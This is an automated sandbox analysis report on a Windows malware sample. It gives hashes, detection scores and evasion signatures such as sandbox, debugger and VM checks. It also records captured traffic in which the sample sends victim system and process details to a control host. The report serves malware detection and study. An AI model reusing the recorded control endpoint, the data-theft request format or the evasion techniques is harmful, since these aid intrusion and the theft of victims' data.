Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
pCElIX19tu.exe

Overview

General Information

Sample name:pCElIX19tu.exe
renamed because original name is a hash value
Original sample name:7e467a1f5f56ccec6f54a2eadd37986e.exe
Analysis ID:1578898
MD5:7e467a1f5f56ccec6f54a2eadd37986e
SHA1:426d5026d97aa82176c37fb6dfa90b0a42b0bfab
SHA256:11b8f5c194882d807a554abc6614b55cbbd45ca2370ed7cad82509653ccd39ce
Tags:exeuser-abuse_ch
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Hides threads from debuggers
Leaks process information
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Entry point lies outside standard sections
Found large amount of non-executed APIs
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • pCElIX19tu.exe (PID: 4416 cmdline: "C:\Users\user\Desktop\pCElIX19tu.exe" MD5: 7E467A1F5F56CCEC6F54A2EADD37986E)
    • WerFault.exe (PID: 5692 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4416 -s 1140 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

No Sigma rule has matched

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus / Scanner detection for submitted sample
Source: pCElIX19tu.exeAvira: detected
Multi AV Scanner detection for submitted file
Source: pCElIX19tu.exeVirustotal: Detection: 51%Perma Link
Source: pCElIX19tu.exeReversingLabs: Detection: 50%
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: pCElIX19tu.exeJoe Sandbox ML: detected
Source: pCElIX19tu.exe, 00000000.00000003.2161664264.0000000007966000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_e82b85d4-f
Source: pCElIX19tu.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global trafficHTTP traffic detected: POST /zldPRFrmVFHTtKntGpOv1734579851 HTTP/1.1Host: home.fivetk5ht.topAccept: */*Content-Type: application/jsonContent-Length: 500222Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 37 30 38 33 32 35 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 31 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 36 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 36 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 33 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3
Source: global trafficHTTP traffic detected: POST /zldPRFrmVFHTtKntGpOv1734579851 HTTP/1.1Host: home.fivetk5ht.topAccept: */*Content-Type: application/jsonContent-Length: 500222Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 37 30 38 33 32 35 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 31 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 36 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 36 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 33 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3
Source: global trafficHTTP traffic detected: POST /zldPRFrmVFHTtKntGpOv1734579851 HTTP/1.1Host: home.fivetk5ht.topAccept: */*Content-Type: application/jsonContent-Length: 500222Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 37 30 38 33 32 35 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 31 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 36 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 36 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 33 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3
Source: global trafficHTTP traffic detected: GET /zldPRFrmVFHTtKntGpOv1734579851 HTTP/1.1Host: home.fivetk5ht.topAccept: */*
Source: Joe Sandbox ViewIP Address: 185.121.15.192 185.121.15.192
Source: Joe Sandbox ViewIP Address: 34.226.108.155 34.226.108.155
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global trafficHTTP traffic detected: GET /zldPRFrmVFHTtKntGpOv1734579851 HTTP/1.1Host: home.fivetk5ht.topAccept: */*
Source: global trafficDNS traffic detected: DNS query: httpbin.org
Source: global trafficDNS traffic detected: DNS query: home.fivetk5ht.top
Source: unknownHTTP traffic detected: POST /zldPRFrmVFHTtKntGpOv1734579851 HTTP/1.1Host: home.fivetk5ht.topAccept: */*Content-Type: application/jsonContent-Length: 500222Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 37 30 38 33 32 35 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 31 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 36 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 36 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 33 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3
Source: pCElIX19tu.exe, 00000000.00000003.2161664264.0000000007966000.00000004.00001000.00020000.00000000.sdmp, pCElIX19tu.exe, 00000000.00000002.2554096574.00000000013FD000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://.css
Source: pCElIX19tu.exe, 00000000.00000003.2161664264.0000000007966000.00000004.00001000.00020000.00000000.sdmp, pCElIX19tu.exe, 00000000.00000002.2554096574.00000000013FD000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://.jpg
Source: pCElIX19tu.exe, pCElIX19tu.exe, 00000000.00000003.2470021536.0000000001C71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fivetk5ht.top/zldPR
Source: pCElIX19tu.exe, 00000000.00000002.2554096574.00000000013FD000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv17
Source: pCElIX19tu.exe, 00000000.00000002.2555383206.0000000001C71000.00000004.00000020.00020000.00000000.sdmp, pCElIX19tu.exe, 00000000.00000002.2555383206.0000000001BEE000.00000004.00000020.00020000.00000000.sdmp, pCElIX19tu.exe, 00000000.00000002.2554096574.00000000013FD000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851
Source: pCElIX19tu.exe, 00000000.00000002.2555383206.0000000001BEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv17345798516963
Source: pCElIX19tu.exe, 00000000.00000002.2554096574.00000000013FD000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851http://home.fivetk5ht.top/zldPRFrmVFHTtKntGp
Source: pCElIX19tu.exe, 00000000.00000002.2555383206.0000000001BEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851lse
Source: pCElIX19tu.exe, 00000000.00000003.2161664264.0000000007966000.00000004.00001000.00020000.00000000.sdmp, pCElIX19tu.exe, 00000000.00000002.2554096574.00000000013FD000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://html4/loose.dtd
Source: Amcache.hve.6.drString found in binary or memory: http://upx.sf.net
Source: pCElIX19tu.exe, 00000000.00000002.2554096574.00000000013FD000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://curl.se/docs/alt-svc.html
Source: pCElIX19tu.exe, 00000000.00000002.2554096574.00000000013FD000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://curl.se/docs/hsts.html
Source: pCElIX19tu.exe, 00000000.00000003.2161664264.0000000007966000.00000004.00001000.00020000.00000000.sdmp, pCElIX19tu.exe, 00000000.00000002.2554096574.00000000013FD000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://curl.se/docs/http-cookies.html
Source: pCElIX19tu.exe, 00000000.00000003.2161664264.0000000007966000.00000004.00001000.00020000.00000000.sdmp, pCElIX19tu.exe, 00000000.00000003.2202285638.0000000001C2E000.00000004.00000020.00020000.00000000.sdmp, pCElIX19tu.exe, 00000000.00000002.2554096574.00000000013FD000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://httpbin.org/ip
Source: pCElIX19tu.exe, 00000000.00000003.2161664264.0000000007966000.00000004.00001000.00020000.00000000.sdmp, pCElIX19tu.exe, 00000000.00000002.2554096574.00000000013FD000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://httpbin.org/ipbefore
Source: pCElIX19tu.exe, 00000000.00000003.2202285638.0000000001C2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/iperface
Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708

System Summary

barindex
PE file contains section with special chars
Source: pCElIX19tu.exeStatic PE information: section name:
Source: pCElIX19tu.exeStatic PE information: section name: .idata
Source: pCElIX19tu.exeStatic PE information: section name:
Source: C:\Users\user\Desktop\pCElIX19tu.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4416 -s 1140
Source: pCElIX19tu.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: pCElIX19tu.exeStatic PE information: Section: dpvazfap ZLIB complexity 0.9944694301311617
Source: classification engineClassification label: mal100.troj.evad.winEXE@2/5@10/2
Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4416
Source: C:\Users\user\Desktop\pCElIX19tu.exeMutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\35af6959-d925-49d5-a189-e0aea75366d5Jump to behavior
Source: C:\Users\user\Desktop\pCElIX19tu.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\Desktop\pCElIX19tu.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\pCElIX19tu.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\pCElIX19tu.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\pCElIX19tu.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\pCElIX19tu.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: pCElIX19tu.exeVirustotal: Detection: 51%
Source: pCElIX19tu.exeReversingLabs: Detection: 50%
Source: pCElIX19tu.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: unknownProcess created: C:\Users\user\Desktop\pCElIX19tu.exe "C:\Users\user\Desktop\pCElIX19tu.exe"
Source: C:\Users\user\Desktop\pCElIX19tu.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4416 -s 1140
Source: C:\Users\user\Desktop\pCElIX19tu.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\pCElIX19tu.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\Desktop\pCElIX19tu.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\pCElIX19tu.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\pCElIX19tu.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\pCElIX19tu.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\pCElIX19tu.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\Desktop\pCElIX19tu.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\Desktop\pCElIX19tu.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\pCElIX19tu.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\pCElIX19tu.exeSection loaded: pnrpnsp.dllJump to behavior
